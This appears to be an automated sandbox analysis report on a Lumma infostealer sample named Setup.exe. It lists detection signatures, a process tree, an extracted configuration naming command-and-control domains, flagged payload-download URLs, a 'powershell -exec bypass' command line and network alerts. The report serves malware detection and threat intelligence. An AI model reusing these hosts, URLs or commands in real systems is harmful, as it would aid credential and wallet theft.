Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1580119
MD5:	cd7e85c71b3d9a273bcb5f3b3d8f51d5
SHA1:	2128655018d5c284364299dc3995a3a22c397d20
SHA256:	5579c8e89e85118cb2b7eb5d63d7b8ae3b4b7aba66aa719467ae1b2871d47716
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sigma detected: Suspicious PowerShell Parameter Substring

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: CD7E85C71B3D9A273BCB5F3B3D8F51D5)

powershell.exe (PID: 6292 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["curverpluch.lat", "talkynicer.lat", "slipperyloo.lat", "tentabatte.lat", "bashfulacid.lat", "manyrestro.lat", "moanungsnake.click", "shapestickyr.lat", "wordyfindy.lat"], "Build id": "hRjzG3--DNO"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1940166955.0000000000E70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4a759:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1891443494.0000000000E70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7036	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7036	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7036	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7036, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 6292, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7036, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 6292, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 7036, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 6292, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T00:43:15.163736+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.58.45	443	TCP
2024-12-24T00:43:17.135397+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.58.45	443	TCP
2024-12-24T00:43:19.445183+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.58.45	443	TCP
2024-12-24T00:43:21.769008+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.58.45	443	TCP
2024-12-24T00:43:24.081322+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.58.45	443	TCP
2024-12-24T00:43:27.019056+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.58.45	443	TCP
2024-12-24T00:43:29.378630+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.58.45	443	TCP
2024-12-24T00:43:31.773179+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.58.45	443	TCP
2024-12-24T00:43:34.251949+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.27.229	443	TCP
2024-12-24T00:43:38.981724+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	104.21.84.113	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T00:43:15.898058+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.58.45	443	TCP
2024-12-24T00:43:17.902078+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.58.45	443	TCP
2024-12-24T00:43:32.834281+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	104.21.58.45	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T00:43:15.898058+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.58.45	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T00:43:17.902078+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.58.45	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T00:43:28.058675+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.58.45	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://neqi.shop/	Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/int_clp_ldr_sha.txt8	Avira URL Cloud: Label: malware
Source: https://neqi.shop/sdgjyut/psh.txt	Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/	Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/int_clp_ldr_sha.txtKit/537.36	Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/int_clp_ldr_sha.txtG3	Avira URL Cloud: Label: malware
Source: https://kliptizq.shop/int_clp_ldr_sha.txt	Avira URL Cloud: Label: malware

Found malware configuration

Source: Setup.exe.7036.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "talkynicer.lat", "slipperyloo.lat", "tentabatte.lat", "bashfulacid.lat", "manyrestro.lat", "moanungsnake.click", "shapestickyr.lat", "wordyfindy.lat"], "Build id": "hRjzG3--DNO"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031E8438 CryptUnprotectData,

0_2_031E8438

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000004.00000002.2051861734.0000000008AA2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-0000009Bh]	0_2_00FBA02C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, edx	0_2_00F8E014
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx+00h]	0_2_00F841EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_00FA61CA
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00FBE1CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00FAA15C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, ebx	0_2_00FA8275
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+6BC763FCh]	0_2_00FA026C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+08h]	0_2_00FB721C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov eax, edx	0_2_00FB721C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_00FB721C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-6Fh]	0_2_00FB721C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_00FA9208
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_00F843CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F98340
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	0_2_00FBC4CD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_00FA84C1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_00FA84BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00F9A473
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F8F407
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_00F8F407
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_00FAC5C1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_00FAC5C1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78168CD7h]	0_2_00FBA58C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_00FAA6EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, eax	0_2_00F9A690
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00F8A66C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_00F8D64E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00FBB64C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_00FBC7B6
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-24B7157Ah]	0_2_00FBC74C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_00FA48DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_00F8A8CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+2376781Ah]	0_2_00F9D866
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-0000008Fh]	0_2_00FBA9DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F969C2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00FB495C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000000A8h]	0_2_00FAC950
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F8FAFD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00F83ADC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edx+eax], 0000h	0_2_00FA0AA8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_00FABA42
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_00FABA42
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F8BBC8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00F88BCC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00F88BCC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+ecx], 0000h	0_2_00F9DB62
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_00FA5B4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F8FACC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then test eax, eax	0_2_00FB7CBC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push eax	0_2_00FB7CBC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_00F99C64
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	0_2_00F8DC5F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2DE6A924h]	0_2_00FBEC5C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_00F95DC8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_00FADD84
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_00FADD84
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	0_2_00FA3D0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_00FABEA9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	0_2_00F9AE4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+78h]	0_2_00F9AE4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_00FA6E4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1B4BB045h]	0_2_00FA6E4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_00FABE41
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_00F9DF4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0Ah]	0_2_00F9DF4C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031DDBDB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_031DDBDB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000000A8h]	0_2_031FB124
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_0320C9A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+08h]	0_2_032059F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov eax, edx	0_2_032059F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_032059F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-6Fh]	0_2_032059F0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-0000009Bh]	0_2_03208800
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2DE6A924h]	0_2_0320D430
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_031E8438
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	0_2_031DC433
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031E6B14
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_031F9B3C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edi+ecx], 0000h	0_2_031EC336
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_031F4320
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_031DA39C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_031D73A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_031D73A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_031D2BA0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_031FA216
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_031FA216
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, ebx	0_2_031F6A49
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+6BC763FCh]	0_2_031EEA40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [edx+eax], 0000h	0_2_031EF27C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_031D22B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031DE2A4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031DE2D1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031DE2A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_03203130
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_031F8930
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_031F499E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031E5196
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-0000008Fh]	0_2_032091B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_031F79DC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx+00h]	0_2_031D29C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+2376781Ah]	0_2_031EC03A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_031F30B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_031D90A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-24B7157Ah]	0_2_0320AF20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_031EC720
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0Ah]	0_2_031EC720
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_0320AF8A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, edx	0_2_031DC7E8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_03209E20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_031FA615
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	0_2_031E9620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+78h]	0_2_031E9620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_031DBE22
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_031F5620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1B4BB045h]	0_2_031F5620
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_031D8E40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_031FA67D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, eax	0_2_031E8E64
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_031F8EC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78168CD7h]	0_2_03208D60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_031FC558
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_031FC558
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_031E459C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_031FAD95
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_031FAD95
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_031E8C47
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	0_2_0320ACA1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_031F6C95
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_031F6C90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then test eax, eax	0_2_03206490
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push eax	0_2_03206490
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_031F9CC6
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	0_2_031F24E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.58.45:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.58.45:443
